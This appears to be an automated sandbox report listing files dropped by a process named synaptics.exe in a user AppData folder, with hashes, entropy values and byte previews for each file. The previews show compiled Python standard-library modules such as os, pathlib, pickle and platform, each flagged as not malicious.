                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17643
                                                                                                                                                                                                            Entropy (8bit):5.677434950861475
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HYMcSuUoigjrH1V19yB/sWG5D+nTF+jZjB77rXw0:H9zgl0sWm4+jZjNw0
                                                                                                                                                                                                            MD5:E3D0B960C9414DA941246E477DE142B9
                                                                                                                                                                                                            SHA1:022D40802F454ADBA0997546926A32A1643336F1
                                                                                                                                                                                                            SHA-256:BF69617BFA21506392D3FED6614C4BAF45499FDA3C6FA30FFD3B62A46300B7DB
                                                                                                                                                                                                            SHA-512:C8E88E5F59871C3D5D243ECAECE955828CEB75A28B7D2FE19D9A2B489680AD4280FEC2D9C0D276366947C3D5F6FFDFB39554AFD150CAE7E191389F58EED83C29
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3957
                                                                                                                                                                                                            Entropy (8bit):5.48207399131393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r8lHqPqiKqqHW7Nd5pqKHQwmHv35UkyhWqgv0+USVqtnqqgqhy:r8IPq/qq27NVqKleekdq8LvVqtnqqgqU
                                                                                                                                                                                                            MD5:F2080D8DA9B6CBFB9B8D28DF8E4AD235
                                                                                                                                                                                                            SHA1:EAE3D3C2E72A7DF2626A6F8002ECEF7B28E35DAE
                                                                                                                                                                                                            SHA-256:FA773226DA8B7DE817EA1279DA106B92BC1AF3D617A4CF80F49399AD79E8F826
                                                                                                                                                                                                            SHA-512:988A0492B35FE2E9C986161F0F58412D5B71BC139B17F4BE00563FE696AFC11268C7034D59CEA346347B194669927BF67D2C5DA939C6CC7BFE9EC8B52E7C83DC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15327
                                                                                                                                                                                                            Entropy (8bit):5.43342659646641
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:O7Vr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:gra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                            MD5:DEF977510C8437976A3125618E4A88AB
                                                                                                                                                                                                            SHA1:ACBEC7EECF9AD96FEF55B3DDF9B249617140DEA0
                                                                                                                                                                                                            SHA-256:FA2CB2B40479445962D666F3A75FE9BDA2D6515B11F522EFD7D4C9520C3080C1
                                                                                                                                                                                                            SHA-512:72E892623D6D2B32858C9D6F5D2C9DCC93A9A7C507261B32C63CEEE61117867132C812E703F2DC4E345D6485CFF34DBD8C3B85F3CA350A83C3DE00D78685DC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1771
                                                                                                                                                                                                            Entropy (8bit):5.545556989762179
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l/5kKoXsYZdrK2Ezwp8ItqhhhUIuoLpP0I2GIikGmObMn:ZhoP2hOqhDaodpkwbMn
                                                                                                                                                                                                            MD5:29B22E94CCCA7F20F091BDF7BB601B1A
                                                                                                                                                                                                            SHA1:0B657E54AD5D9533C17E7BFEE163FB10066A013E
                                                                                                                                                                                                            SHA-256:42F4029459481A9CB9DCBA8D1208B9DE854731D4B92AE9A4A5D38560A3DC84E6
                                                                                                                                                                                                            SHA-512:A258C6108A829C987B35D5D719D890A0883A391BC6A73977ABCB0D674552739FDFD19C54C8E621DEA974CF622188230520B8081C7A77DC70D431127253B0D028
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....9C:\Users\user\AppData\Local\xFSOj9El1Q\lib\nturl2path.py..url2pathname....s*.............................................r....c.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5471
                                                                                                                                                                                                            Entropy (8bit):5.651468757325197
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xsgyb2Y4AiIw0UEDJdWzvlNA/DFi1foNC3SdGCDO1WnOhf:/ySYRRDX9k1fb3H3WnOhf
                                                                                                                                                                                                            MD5:5E993B1C8A5DFB24019F1ABCC1FF04B3
                                                                                                                                                                                                            SHA1:AA2689E848010AC62366C6DC9A485C6613EE3303
                                                                                                                                                                                                            SHA-256:D5924795FED669EA7BF41AB2F13FBCC8F6E8E46C5CFC090B8DF6A8670772C67E
                                                                                                                                                                                                            SHA-512:FBD3DC56F676DBD9AA665D36212EF2B0FAA30B3D36907623D882BD776A4D847EE0018EFF1C0796291EFB41783E7DDC560D6D0B42C958AA60FF324C2266A7210B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s"...d.Z.g.d...Z.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.i.Z.d.d...e.d...D...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d ....e.d!d"....e.d#d$....e.d%d&....e.d'd(....e.d)d*....e.d+d,....e.d-d.....e.d/d0....e.d1d2....e.d3d4....e.d5d6....e.d7d8....e.d9d:....e.d;d<....e.d=d>....e.d?d@....e.dAdB....e.dCdD....e.dEdF....e.dGdH....e.dIdJ....e.dKdL....e.dMdN....e.dOdP....e.dQdR....e.dSdT....e.dUdV....e.dWdX....e.dYdZ....e.d[d\....e.d]d^....e.d_d`....e.dadb....e.dcdd....e.dedf....e.dgdh....e.didj....e.dkdl....e.dmdn....e.dodp....e.dqdr....e.dsdt....e.dudv....e.dwdx....e.dydz....e.d{d|....e.d}d~....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....d.Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e...d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13532
                                                                                                                                                                                                            Entropy (8bit):4.847870676171198
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:925I4L+HQe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:g5feTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                            MD5:AC65AD2CABB94CF45F80F5D79EC5BB57
                                                                                                                                                                                                            SHA1:CB54F60A5F32160C3BF8F16512D1FAFEFA80BC6A
                                                                                                                                                                                                            SHA-256:0FB79330E531D42A6DDD528A73B659E59781A5BA0375075131AA3C906BC37FD8
                                                                                                                                                                                                            SHA-512:42D0AD195CC1054D1FC797D973B27B8EB4FEC54CAC3D9D2759150DECDAF57BF6F9985DC60E759A6B4E9116003CC30414BD0B018490D92DCAC68AE895B72F7122
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31623
                                                                                                                                                                                                            Entropy (8bit):5.452605491651272
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:3Zz4c1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:VbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                            MD5:24F6C9908129A772B47B0511F2FE476D
                                                                                                                                                                                                            SHA1:4CF7B2A36596D8866E956BBCBC91D937DFA99363
                                                                                                                                                                                                            SHA-256:9A20E1FD660C179F9F91E71C391472AC9651D1A6448E57F7AF941E0EF91F4292
                                                                                                                                                                                                            SHA-512:5EE915291A901FC2E1960BE4AC405CF18EB9C0AA4B0EF7DC163557006EF87160987F3D41AE713F5C044EC87B6A79D5D64F56D6EA1F2BB1D20B00577D12915904
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42076
                                                                                                                                                                                                            Entropy (8bit):5.2374924748883345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:LWHqw6pgaOSKyzD3ZslxWCPnN3v5HgAgRDTMJ68UH73dT0Lwp4oMcce2A6VJSWm+:iKw6pL3MvPnN3v5HgAmDTMK7N8wpjMiS
                                                                                                                                                                                                            MD5:555F4ACF5820D6AC37440A723E79D504
                                                                                                                                                                                                            SHA1:8C58A4888EC27D9A9FDC184802A54F71C573174E
                                                                                                                                                                                                            SHA-256:3E4B0DB65F982C8E60B982E2A31C3BDB6346767A86E99AAA773C1B6650822DA2
                                                                                                                                                                                                            SHA-512:AE8DF09F13FCC051ADAFB57539C7E5126048B4BC25BD906A5F2F666216543DFAE575E49D1265FC1D943184B21EAF28744CE44395B4458D20B2640D00F01A6022
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):46906
                                                                                                                                                                                                            Entropy (8bit):5.389985066294267
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:/TDMLHxkafcMRD5gCaBMCrr6i8Tf56zENKkOJI/OpdG9SNnvsprxEkn/BVTiIS4n:/TDoxVfcMJaBMCrr6iUmTJIoNnvsprxR
                                                                                                                                                                                                            MD5:6F4DD985ECA290EE51AEBA8431A8833E
                                                                                                                                                                                                            SHA1:D12E9C314F71BBFE04994316CA7CEA30D63677D3
                                                                                                                                                                                                            SHA-256:27C2168B9381404C17D2FD5590A0D610539211CC7332849685F8F9F6C1F6C855
                                                                                                                                                                                                            SHA-512:A329A709B70474DA1CD73BF547B46F9EEB96E93917D2587D54E06ABCEB791A591EFF09397AC71CEF5CE661655D5012208B8DD567884E0864854EE8B26AC26FC3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sN...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.z.d.d.l.m.Z...e...d.....d.Z.W.n...e.yd......d.Z.Y.n.w.e.e.f.Z.d.Z.g.d...Z.d.Z d.Z!G.d.d...d.e"..Z#G.d.d...d.e#..Z$G.d.d...d.e#..Z%G.d.d...d.e"..Z&z.d.d.l'm(Z(..W.n...e.y.......d.Z(Y.n.w.d.Z)d.Z*d.Z+d.Z,d Z-d!Z.d"Z/d#Z0d$Z1d%Z2d&Z3d'Z4d(Z5d)Z6d*Z7d+Z8d,Z9d-Z:d.Z;d/Z<d0Z=d1Z>d2Z?d3Z@d4ZAd5ZBd6ZCd7ZDd8ZEd9ZFd:ZGd;ZHd<ZId=ZJd>ZKd?ZLd@ZMdAZNdBZOdCZPdDZQdEZRdFZSdGZTdHZUdIZVdJZWdKZXdLZYdMZZdNZ[dOZ\dPZ]dQZ^dRZ_eOeYeZe[g.Z`dSZadTZbdUZcdVZddWZedXZfdYZgdZZhd[Zid\Zjd]Zkd^Zld_Zmd`ZndaZoe..pdbdc..eq..D.......G.ddde..de..ZrG.dfdg..dg..Zsdhdi..Ztdjdk..Zudldm..Zvdndo..ZwG.dpdq..dq..ZxG.drds..ds..Zyd.d.d.dt..dudv..Zzd.d.d.dt..dwdx..Z{d.dydzd.d{..d|d}..Z|d.dydzd.d{..d~d...Z}z.d.d.l.m#Z#m$Z$m%Z%m~Z~m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e...y.......exey..Z~Z.eze{e|e}f.\.Z.Z.Z.Z.Y.n.w.d.d...Z.e.d.k...r#d.d.l.Z.e.j.d.d...Z.e.j.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):27453
                                                                                                                                                                                                            Entropy (8bit):5.590842955180001
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:gBuj93Ho+Dvz6WYt08jHUgRyRj4/ISTvI9nI6xk4laOXN4Ww:gBI93oEbq089oRjnuunI6xs64F
                                                                                                                                                                                                            MD5:B1507582152E065775612FE3E6BDBD8C
                                                                                                                                                                                                            SHA1:54BA774E6A14D2E70802747253CD4AD50AA8DCD7
                                                                                                                                                                                                            SHA-256:790D751D6B8B923BCC21FB3D4518D41019E064F4D5A6772CAC4EEB072DBCFD50
                                                                                                                                                                                                            SHA-512:26072AE9A2D11AB191DFFF8BB0C3FD29E397BDC011352958FCE3851802326ED018D804E36D7F5C806AC38ACEFDB6E92C7AD50271B339DFC6E93607617DDC51D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dH........................@...s....d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d...Z.e...d...Z.d.d...Z.e...d.e.j...Z.d.d.d...Z.d.d.d...Z.e...d...Z.....d.d.d...Z.d.d.d.d.d.d.d d!d"d#d$d%..Z.d.d&d'd(d)d*d+..Z.d,d-..Z.d.d/..Z.d.d0d1..Z.d2d3..Z.d.d5d6..Z.d7d8..Z.d.d9d:..Z.d;d<..Z.d=d>..Z.d.d?d@..Z.dAdB..Z d.dCdD..Z!dEdFdGd...Z"e.j#d.d.f.dHdI..Z$dJdK..Z%G.dLdM..dM..Z&dNdO..Z'G.dPdQ..dQe..(dRdS....Z)d.a*dTdU..Z+dVdW..Z,dXdY..Z-dZd[..Z.d\d]..Z/d^d_..Z0d`da..Z1e...dbe.j...Z2e...dce.j...Z3e...dd..Z4e...de..Z5i.Z6d.dfdg..Z7dhdi..Z8djdk..Z9dldm..Z:dndo..Z;dpdq..Z<drds..Z=dtdu..Z>i.Z?d.dvdw..Z@e...dx..ZAe...dy..ZBdzZCd.aDd{d|..ZEd}d~..ZFeGd.k...rjd.e.jHv...pPd.e.jHv.ZId.e.jHv...o[d.e.jHv.ZJeKe@eJeI......e..Ld.....d.S.d.S.).a8... This module tries to retrieve as much platform-identifying data as. possible. It makes this information available via function APIs... If called from the command line, it prints the platform. information conca
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10554
                                                                                                                                                                                                            Entropy (8bit):5.330459009759025
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Chb0oiiyslc6Yc5JJ0kMz8g1z37oItrg2spGuDbTM0tNWCEZC:ChGiLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                            MD5:6E9649441D37AA296FF8099A65088B67
                                                                                                                                                                                                            SHA1:597AA007F7AB219F1481C92F02B4CBE60919B2F2
                                                                                                                                                                                                            SHA-256:6203DB970729A378BAFB3FD7742BEC58B58AFDDD9041426FCC6A6E88EBD74A5E
                                                                                                                                                                                                            SHA-512:794306AC336AF661DEA29ACAD2D28F4B400988659F0839E573C4C089ED579AF71E9F5657E1513C0AAA099641E51ACF7AF20FA5FE3E075526A58D4F23C5CEB8FF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10816
                                                                                                                                                                                                            Entropy (8bit):5.0817922186062265
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Gu+pM4sfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:J+pM3Qdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                            MD5:2138F78F6E06C7BF9CEFA664C6E6E9A7
                                                                                                                                                                                                            SHA1:454918C6C27089C099F8A402BE863E5192588FAC
                                                                                                                                                                                                            SHA-256:F57E213A10D869916CB5AA374B9C7874A38211E6D85BF9D25EE1722CA39D019B
                                                                                                                                                                                                            SHA-512:67CC3D4492BDAAC33C40FF14D7C3EFE6D56389FE857EF6BE9627863AF77158F465F19F1F88B9D577BD23E8F5A4703F7B6B90F19BDBA18EE3892870A96ACC6AC1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
